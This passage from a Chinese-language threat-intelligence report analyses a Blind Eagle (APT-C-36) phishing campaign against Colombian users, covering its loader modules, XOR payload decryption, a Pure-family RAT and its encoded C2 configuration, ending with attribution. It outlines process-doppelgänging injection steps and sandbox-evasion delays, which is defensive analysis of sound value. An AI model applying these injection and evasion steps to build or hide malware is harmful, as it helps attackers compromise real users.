15px;">图24  检查进程是否为杀毒软件进程</span></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">ESAL模块的作用为将已注入的shellcode清除，并执行最终载荷。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">COPYLIST模块内包含了用以拷贝进临时目录中的文件名，通过它们实现持久化。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">modCreateprocess模块的作用为创建指定的进程，该进程执行的是shellcode或最终载荷注入的目标（%userprofile%\AppData\Roaming\systemdocker\Chime.exe等），其中的关键调用通过TinycallProxy模块实现。例如CreateProcessW、NtDelayExecution等。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">rshell模块功能为执行最终载荷。最终载荷以4字节异或的方式被解密出来，然后检查该载荷的PE信息，以确定后续注入方式。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024076" class="rich_pages wxw-img" data-ratio="0.5233333333333333" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=fd6d6d13&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Prs5yA6pdsEGAibS4IlKiaDqFMruDJ9eNhLdI2RqF1ocmc9L5VMibFm7s8P5uKU32ibvyTApQib6EgO8HA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="3 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span style="font-size: 17px;letter-spacing: 0.578px;"><span leaf=""><span textstyle="" style="font-size: 15px;">图25  解密最终载荷</span></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">检查预设注入类型后实施注入操作，此处类型为3。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024077" class="rich_pages wxw-img" data-ratio="0.29699666295884314" data-type="png" data-w="899" src="https://wechat2rss.xlab.app/img-proxy/?k=8af3f71d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Prs5yA6pdsEGAibS4IlKiaDqFpWq99mPxjIa0ibOOgDHC1fvickt5MRCJ01I9nGjYF0QK0VuRPV19kpBg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;text-align: center;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><span textstyle="" style="font-size: 15px;">图26  向TeraNa.exe注入rshell模块</span></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">根据标志位的设置，可选择6种不同的注入方式。在本例中标志位按位与4为true，同时按位与0x80为false，故采用了进程分身[3][4]的方式实现了对TeraNa.exe的注入操作，该方法是一种利用事务性 NTFS（TxF） 写入+节映射来在不落地文件的情况下创建并执行恶意进程的隐蔽技术。主要步骤包括：</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">1)  TxF：创建一个文件系统事务（Transaction），并将当前线程绑定到该事务；</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">2)  PE 结构修改：在内存中构造目标PE 文件的“dat”节区；</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">3)  使用modCreateProcess创建进程，再通过NtOpenProcess调用，打开目标进程；</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">4)  调用NtGetContextThread、NtSetContextThread获取和更改目标线程的寄存器状态；</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">5)  调用NtDelayExecution暂停一段时间，以逃避基于时间检测的沙箱；</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">6)  将rshell模块写入进程入口；</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">7)  调用NtResumeThread运行该进程。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024078" class="rich_pages wxw-img" data-ratio="0.8544444444444445" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=59d61ec8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Prs5yA6pdsEGAibS4IlKiaDqFX0tcwx0icm2go28jSv7zcJRkHibCHxM3RnJCiaSj5xZhHtICN3RVvrvKQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong style="color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;"><span style="font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;line-height: 1.6em;text-indent: 0em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(190, 25, 31);font-size: var(--articleFontsize);letter-spacing: 0.034em;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">3. </span><span leaf="">最终载荷分析</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">最终载荷被注入到一个白文件，该恶意载荷是属于Pure家族的远程控制软件，它由地下网络犯罪开发者团体PureCoder开发，具有收集主机信息、虚拟环境监测、加载各类插件等功能。</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">该载荷如下图所示，已使用.NET Reactor进行了重度混淆保护，具有防止反编译的功能，不具备可读字符。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024080" class="rich_pages wxw-img" data-ratio="0.34" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=ad25726d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Prs5yA6pdsEGAibS4IlKiaDqFlbT9YV2jAWUPG4b7wwEibDOjl6H4wkicibtHyjq8LDHsGpL6EfibnJbCEg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图28  在dnSpy内查看提取到的RAT反编译结果</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024081" class="rich_pages wxw-img" data-ratio="0.20555555555555555" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=747e5c15&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Prs5yA6pdsEGAibS4IlKiaDqFDpWnBJjm8Adyofo6hxfeYd3zVu6DA0D5q1qXhwibibS3Uic2doJEtNT8Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图29  提取到的RAT文件信息</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">该RAT的配置信息经Protobuf序列化、Gzip压缩、Base64编码三步处理后存储在载荷中。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024082" class="rich_pages wxw-img" data-ratio="0.41888888888888887" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=033cb03a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Prs5yA6pdsEGAibS4IlKiaDqFbvsaj1VzoU3nrDZbvLNicBXhzk5DVeHbdWtJlicrDpphG4uXiaB7ibwAMw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图30  加密的配置信息</span></span></span></p></div></div><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">经解码和解压缩，可以看到它的配置信息如下：</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 0px;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-wrap: wrap;"><span leaf=""><img data-imgfileid="100024083" class="rich_pages wxw-img" data-ratio="0.3111111111111111" data-type="png" data-w="900" src="https://wechat2rss.xlab.app/img-proxy/?k=caddeb19&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Prs5yA6pdsEGAibS4IlKiaDqFQNYQY7Y1JDCICFjktTFUdZlaaGu6e2oLSGV2KF897dR7Np1icpplxQQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 0px;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;text-align: center;"><span style="letter-spacing: 0.578px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf=""><span textstyle="" style="font-size: 15px;">图31  解密和解压缩后的配置信息</span></span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">各字段分别代表C2服务器域名、端口、TLS证书、ID、环境变量路径、互斥量等信息。</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="background-color: rgb(190, 25, 31);font-size: 18px;"><strong><span style="background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;Powered by 135editor.com&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;paragraph&#34;,&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);font-size: 18px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;background-color: rgb(190, 25, 31);line-height: 43.38px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(255, 255, 255);&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"> 三、归属研判 </span></span></strong></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">通过对本次攻击活动的分析，我们发现攻击方式与APT-C-36（盲眼鹰）组织的技术特征较为符合，具体总结如下：</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">(1)  钓鱼诱饵以司法类文件为主题，面向哥伦比亚境内用户，与过往活动完全一致[5]。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 17px;letter-spacing: 0.578px;text-indent: 37.3333px;text-wrap: wrap;"><span leaf="">(2)  多阶段加载dll、注入手法、注入目标（pla.dll等系统dll）、恶意载荷数据文件命名（无意义的拉丁字母和扩展名）等活动特点与以往类似。</span></span></span></p><p style="margin-top: 24px;margin-bottom: 24px;text-indent: 2em;line-height: 1.6em;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 